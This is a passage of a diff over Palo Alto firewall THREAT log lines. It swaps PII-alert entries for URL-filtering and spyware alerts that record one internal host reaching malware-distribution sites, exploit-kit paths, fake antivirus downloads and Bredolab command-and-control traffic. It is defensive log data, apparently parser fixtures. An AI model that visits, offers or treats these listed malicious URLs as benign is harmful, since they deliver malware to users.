06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0, +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0, +Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0, +Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0, +Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 